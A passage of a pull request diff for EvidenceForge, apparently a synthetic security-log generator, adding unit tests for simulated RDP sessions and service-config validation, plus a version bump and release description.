+        session_ready_time = session_time + timedelta(seconds=3)
+        session = SimpleNamespace(
+            username=actor.username,
+            system=target.hostname,
+            logon_id="0xrdp",
+            logon_type=10,
+            source_ip=source.ip,
+            start_time=session_ready_time,
+            source_ready_time=session_ready_time,
+            network_close_time=session_time + timedelta(minutes=30),
+            session_kind="rdp",
+        )
+
+        class _FakeWorldModel:
+            def system_for_ip(self, ip: str) -> System | None:
+                return source if ip == source.ip else None
+
+            def plan_session(self, *args: Any, **kwargs: Any) -> SimpleNamespace:
+                return SimpleNamespace(session_kind="rdp")
+
+        class _FakeWorldPlanner:
+            def __init__(self, state_manager: _FakeStateManager) -> None:
+                self.state_manager = state_manager
+                self.bootstrap_calls: list[dict[str, Any]] = []
+                self.ensure_calls: list[dict[str, Any]] = []
+
+            def bootstrap_user_session(self, **kwargs: Any) -> SimpleNamespace:
+                self.bootstrap_calls.append(kwargs)
+                self.state_manager.sessions[session.logon_id] = session
+                return SimpleNamespace(session=session, network_uid="Crdp00000000001")
+
+            def ensure_user_session(self, *args: Any, **kwargs: Any) -> SimpleNamespace:
+                self.ensure_calls.append({"args": args, "kwargs": kwargs})
+                replacement = SimpleNamespace(
+                    username=actor.username,
+                    system=target.hostname,
+                    logon_id="0xduplicate",
+                    logon_type=10,
+                    source_ip=source.ip,
+                    start_time=kwargs.get("time", session_time),
+                    network_close_time=session_time + timedelta(minutes=30),
+                    session_kind="rdp",
+                )
+                self.state_manager.sessions[replacement.logon_id] = replacement
+                return replacement
+
+        state_manager = _FakeStateManager()
+        planner = _FakeWorldPlanner(state_manager)
+        engine = object.__new__(StorylineMixin)
+        engine.scenario = SimpleNamespace(
+            environment=SimpleNamespace(systems=[source, target], service_accounts=[])
+        )
+        engine.state_manager = state_manager
+        engine.activity_generator = _FakeActivityGenerator()
+        engine.dispatcher = SimpleNamespace(visibility_engine=None)
+        engine.world_model = _FakeWorldModel()
+        engine.world_planner = planner
+
+        rdp_spec = SimpleNamespace(type="rdp_session", source_ip=source.ip)
+        process_spec = SimpleNamespace(
+            type="process",
+            process_name=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
+            command_line="powershell.exe -NoProfile Get-Process",
+        )
+
+        event = engine._execute_typed_event(
+            spec=rdp_spec,
+            actor=actor,
+            system=target,
+            time=session_time,
+            activity="open remote desktop session",
+            explicit_types={"rdp_session"},
+        )
+        requested_process_time = session_time + timedelta(seconds=1)
+        process_time = engine._apply_storyline_shell_availability(
+            actor=actor,
+            system=target,
+            time=requested_process_time,
+            rng=random.Random(1),
+        )
+        engine._execute_typed_event(
+            spec=process_spec,
+            actor=actor,
+            system=target,
+            time=process_time,
+            activity="run remote command in the RDP session",
+            explicit_types={"process"},
+        )
+
+        assert event is not None
+        assert event["uid"] == "Crdp00000000001"
+        assert planner.bootstrap_calls[0]["session_kind"] == "rdp"
+        assert process_time > session_ready_time
+        assert planner.ensure_calls == []
+        assert engine.activity_generator.processes[-1]["logon_id"] == "0xrdp"
+        assert (
+            engine._last_storyline_logon_by_actor_system[(actor.username, target.hostname)]
+            == "0xrdp"
+        )
+        assert (
+            engine._last_storyline_logon_source_by_actor_system[(actor.username, target.hostname)]
+            == source.ip
+        )
 
     def test_recent_psexesvc_service_runs_follow_on_commands_as_system(self):
         source = System(

--- a/tests/unit/test_validate_config.py
+++ b/tests/unit/test_validate_config.py
@@ -2045,6 +2045,41 @@ class TestValidateConfig:
             for issue in result.issues
         )
 
+    def test_validate_config_rejects_singleton_service_without_services_parent(self, monkeypatch):
+        from evidenceforge.generation.activity import system_processes
+
+        real_loader = system_processes.load_system_processes
+
+        def load_invalid_system_processes():
+            data = real_loader()
+            services = {
+                role: [dict(entry) for entry in entries]
+                for role, entries in data.get("system_services", {}).items()
+            }
+            services.setdefault("workstation", []).append(
+                {
+                    "image": r"C:\Program Files\Agent\AgentSvc.exe",
+                    "command_templates": ["AgentSvc.exe"],
+                    "parent": "svchost_dcom",
+                    "singleton": True,
+                }
+            )
+            return {**data, "system_services": services}
+
+        monkeypatch.setattr(
+            system_processes, "load_system_processes", load_invalid_system_processes
+        )
+
+        result = validate_config()
+
+        assert any(
+            issue.severity == "ERROR"
+            and issue.file == "system_processes.yaml"
+            and 'Singleton Windows service "agentsvc.exe"' in issue.message
+            and 'parent "services"' in issue.message
+            for issue in result.issues
+        )
+
     def test_validate_config_rejects_command_template_escaped_brace_leaks(self, monkeypatch):
         from evidenceforge.generation.activity import application_catalog
 

--- a/uv.lock
+++ b/uv.lock
@@ -165,7 +165,7 @@ wheels = [
 
 [[package]]
 name = "evidence-forge"
-version = "1.10.0"
+version = "1.11.0"
 source = { editable = "." }
 dependencies = [
     { name = "click" },


### PR DESCRIPTION
## Summary

- Publish the latest dev realism refinements to `main`.
- Adds expanded iteration-test assessment-loop handoff notes and generation/source-native improvements from the latest dev pass.
- Bumps EvidenceForge from `1.10.0` to `1.11.0` and prepends the `v1.11.0` changelog entry.

## Root Cause / Impact

The prior `dev` tip contained scenario validation and generation refinements after the `1.10.0` release bump, so a new release bump was required before opening the `dev` -> `main` PR. The bump commit updates `pyproject.toml`, `src/evidenceforge/__init__.py`, `uv.lock`, and `CHANGELOG.md` together per the release workflow.

## Validation

- `uv run pytest --no-cov -q` -> `4874 passed, 19 skipped` before the release metadata bump.
- `uv run ruff check .` -> passed after the release bump.
- `uv run ruff format --check .` -> passed after the release bump.
- Version guard verified `pyproject.toml`, `src/evidenceforge/__init__.py`, and `uv.lock` all declare `1.11.0`.
- Remote tag guard checked that `v1.11.0` does not already exist.

## Notes

`dev` and `main` have diverged since the `v1.10.0` release merge, but the PR diff is the two intended commits ahead of the shared merge base.